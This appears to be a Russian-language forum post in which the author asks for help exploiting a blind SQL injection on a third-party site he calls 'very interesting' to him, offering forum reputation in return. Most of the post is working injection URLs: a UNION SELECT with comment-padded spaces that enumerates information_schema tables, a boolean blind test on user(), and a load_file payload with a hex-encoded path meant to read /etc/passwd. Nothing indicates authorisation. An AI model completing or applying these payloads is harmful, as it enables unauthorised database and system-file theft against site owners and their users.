Один очень интересный мне сайт имеет багу, инъекция слепая.
кавычки:
1) слешируются
2) подстановка кавычек обрабатывается и выдает пустую страницу.
http://site.ru/index.php?act=18/**/union/**/select/**/concat_ws(0x3a,table_name)/**/from/**/information_schema.tables/**/limit/**/0,1--
всего одна таблица. надо вытащить её название и после колонок в ней.

http://site.ru/index.php?act=25+AND+ascii(lower(substring(user(), 1,1)))=97--
юзера, систем_юзера подобрал. версия мускль 5.

http://site.ru/index.php?act=25+union+select+load_file(0x2F6574632F706173737764)--
особо интересно получить содержимое файла /etc/paswd. или на крайний случай выжать максимально информации.
За помощь + обеспечен -)